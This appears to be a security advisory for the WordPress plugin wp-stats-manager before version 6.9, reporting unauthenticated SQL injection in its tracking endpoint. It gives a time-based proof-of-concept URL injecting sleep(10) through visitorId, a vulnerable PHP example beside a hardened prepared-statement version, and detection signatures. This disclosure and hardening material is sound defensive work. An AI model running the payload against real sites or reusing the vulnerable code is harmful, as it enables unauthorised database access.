The plugin does not escape user input before concatenating it into an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.
Note: the numeric prefix of the visitorId parameter (the part before the %27) must be different on each try.

https://example.com/?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId=132123’,sleep(10),0,0,0,0,0);–±
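As an added illustration of the pattern the advisory describes (this is not the plugin's own code; the function, table and column names and the `hits` counter are assumptions, and only the request parameter names come from the PoC URL above), here is the unsafe concatenation next to a hardened handler that uses WordPress's `$wpdb->prepare()`:

```php
<?php
// Added illustration, not the plugin's code: request values concatenated into
// SQL (the flaw the advisory reports) beside a hardened version. Function,
// table and column names are hypothetical; the parameters siteId, url, uid,
// pid and visitorId are the ones in the advisory's PoC URL. $wpdb is the
// WordPress global database object.

// VULNERABLE: no escaping and no type checking. A single quote inside
// visitorId closes the string literal and everything after it is parsed as
// SQL, which is what a time-based payload such as sleep(10) relies on.
function wmc_track_vulnerable(wpdb $wpdb, array $req): void {
    $site_id    = $req['siteId'] ?? '';
    $url        = $req['url'] ?? '';
    $uid        = $req['uid'] ?? '';
    $pid        = $req['pid'] ?? '';
    $visitor_id = $req['visitorId'] ?? '';

    $sql = "INSERT INTO {$wpdb->prefix}wmc_visits (site_id, url, uid, pid, visitor_id, hits) "
         . "VALUES ('$site_id', '$url', '$uid', '$pid', '$visitor_id', 1)";
    $wpdb->query($sql);
}

// Accept only a short run of digits for id-style parameters; null otherwise,
// so the caller rejects the request instead of trying to "clean" the value.
function wmc_uint(?string $value): ?int {
    if ($value === null || !preg_match('/^\d{1,10}$/', $value)) {
        return null;
    }
    return (int) $value;
}

// HARDENED: validate the shape of each parameter first, then let
// $wpdb->prepare() bind the values (%d for integers, %s for strings). The
// SQL text itself never contains user-controlled characters, so a quote in
// visitorId cannot alter the query structure.
function wmc_track_hardened(wpdb $wpdb, array $req): bool {
    $site_id    = wmc_uint($req['siteId'] ?? null);
    $uid        = wmc_uint($req['uid'] ?? null);
    $pid        = wmc_uint($req['pid'] ?? null);
    $visitor_id = wmc_uint($req['visitorId'] ?? null);
    $url        = esc_url_raw($req['url'] ?? '');

    if ($site_id === null || $uid === null || $pid === null || $visitor_id === null || $url === '') {
        return false; // malformed input: refuse the request
    }

    $sql = $wpdb->prepare(
        "INSERT INTO {$wpdb->prefix}wmc_visits (site_id, url, uid, pid, visitor_id, hits) "
        . "VALUES (%d, %s, %d, %d, %d, 1)",
        $site_id, $url, $uid, $pid, $visitor_id
    );
    return $wpdb->query($sql) !== false;
}

// Hypothetical hook-up for the public tracking action. WordPress slashes
// $_GET (wp_magic_quotes), so unslash once before validating.
add_action('init', function () {
    global $wpdb;
    if (($_GET['wmcAction'] ?? '') !== 'wmcTrack') {
        return;
    }
    wmc_track_hardened($wpdb, wp_unslash($_GET));
    exit;
});
```

Because a visitor-tracking endpoint is meant to be reachable by anonymous users, requiring authentication is not the fix here; the fix is to stop building SQL by concatenation. Binding with `%d` also gives the id fields a hard type boundary, so a value like `132123',sleep(10),...` is rejected by `wmc_uint()` before any query is built. On the detection side, requests to `wmcAction=wmcTrack` whose query string contains `sleep(` or quote characters, or that take around ten seconds to answer, are the observable signature of the PoC above.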
CPE

| Name | Operator | Version |
|---|---|---|
| wp-stats-manager | lt | 6.9 |